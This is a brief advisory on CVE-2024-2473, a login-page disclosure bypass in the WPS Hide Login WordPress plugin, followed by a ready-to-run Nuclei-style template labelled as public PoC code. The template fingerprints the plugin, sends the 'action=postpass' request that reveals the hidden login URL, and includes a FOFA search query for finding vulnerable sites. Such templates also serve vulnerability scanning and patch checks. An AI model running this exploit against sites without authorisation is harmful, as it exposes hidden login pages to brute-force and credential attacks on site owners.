The WPS Hide Login plugin for WordPress is vulnerable to Login Page Disclosure in all versions up to, and including, 1.9.15.2. This is due to a bypass that is created when the 'action=postpass' parameter is supplied. This makes it possible for attackers to easily discover any login page that may have been hidden by the plugin.
PoC代码[已公开]
id: CVE-2024-2473
info:
name: WPS Hide Login <= 1.9.15.2 - Login Page Disclosure
author: popcorn94
severity: medium
description: |
The WPS Hide Login plugin for WordPress is vulnerable to Login Page Disclosure in all versions up to, and including, 1.9.15.2. This is due to a bypass that is created when the 'action=postpass' parameter is supplied. This makes it possible for attackers to easily discover any login page that may have been hidden by the plugin.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure
- https://nvd.nist.gov/vuln/detail/CVE-2024-2473
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-2473
cwe-id: CWE-200
epss-score: 0.10264
epss-percentile: 0.92884
cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
fofa-query: body="/wp-content/plugins/wps-hide-login"
vendor: wpserveur
product: wps-hide-login
tags: cve,cve2024,wordpress,wp-plugin,wp,disclosure,wps-hide-login
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
matchers:
- type: word
part: response
words:
- "wps-hide"
internal: true
- method: POST
path:
- "{{BaseURL}}/wp-admin/?action=postpass"
matchers:
- type: dsl
dsl:
- "status_code == 302"
- "contains(header, 'Location')"
- "contains_any(header, 'reauth=1', '/login')"
condition: and
# digest: 4b0a00483046022100b81ed247745570c141713d8af8c47869b6b2e6332e91e33646c98a6b26a1370d022100d2b8a1728c9834b5c47322ee20360e96127ed3ecbc66307c6eb44310c5d18a0b:922c64590222798bb761d5b6d8e72950